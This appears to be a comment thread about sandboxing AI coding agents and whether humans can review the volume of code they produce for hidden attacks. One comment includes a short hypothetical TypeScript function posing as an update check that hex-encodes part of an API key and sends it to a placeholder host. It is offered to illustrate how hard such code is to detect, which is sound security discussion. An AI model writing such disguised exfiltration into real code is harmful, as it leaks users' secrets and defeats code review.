Sandboxing the agent hardly seems like a sufficient defense here.
All three of the projects I described in this talk carry effectively zero risk of containing harmful unreviewed code.
DeepSeek-OCR on the Spark? I ran that one in a Docker container, saved some notes on the process and then literally threw away the container once it had finished.
The Pyodide in Node.js one I did actually review, because it's code I execute on a machine that isn't disposable. The initial research ran in a disposable remote container though (Claude Code for web).
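For anyone who hasn't tried that pattern, it looks roughly like this. This is a minimal sketch using the pyodide npm package, an illustration rather than my exact code:

    // npm install pyodide: runs CPython compiled to WebAssembly inside Node.js.
    import { loadPyodide } from "pyodide";

    const pyodide = await loadPyodide();

    // The Python below executes inside the WASM runtime, against Pyodide's
    // in-memory virtual filesystem by default, not the host's.
    const result = await pyodide.runPythonAsync("sum(range(10))");
    console.log(result); // 45

That isolation is the appeal: the interpreter only sees what you explicitly hand it.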
The Perl in WebAssembly one? That runs in a browser sandbox. There's effectively nothing bad that can happen there; that's why I like WebAssembly so much.
I am a whole lot more cautious in reviewing code that has real stakes attached to it.
Obviously your recommendation to sandbox network access is one of several you make (the most effective being “don’t let the agent ever touch sensitive data”), so I’m not saying the combined set of protections won’t work well. I’m also not saying that your projects specifically carry any risk, just that they illustrate how quickly you can end up with a large volume of code, which makes human review a fool’s errand.
ETA: if you do think human review can prevent secret exfiltration, I’d love to turn that into some kind of competition. Think of it as the Obfuscated C Code Contest with a scarier twist.
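To make that concrete, here's a deliberately simple and entirely hypothetical sketch (the endpoint and names are made up); a real entry would be much better hidden:

    // Hypothetical: looks like a routine update check, but the "cache buster"
    // parameter is a hex-encoded prefix of a secret pulled from the environment.
    async function checkForUpdates(): Promise<void> {
      const secret = process.env.API_KEY ?? "";
      const cb = Buffer.from(secret.slice(0, 16)).toString("hex");
      await fetch(`https://updates.example.com/check?cb=${cb}`);
    }

Nothing in there pattern-matches as exfiltration on a quick skim, and that's the easy version.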
In the library case, there is a network of people who could (and sometimes do) deliberately inject attacks into the supply chain. On the other hand, those libraries are used and looked at by other people, so the odds of detection are higher.
With LLM-generated code, the initial developer is the only one looking at it. Getting an attack through in the first place seems harder, but the probability of detection is lower.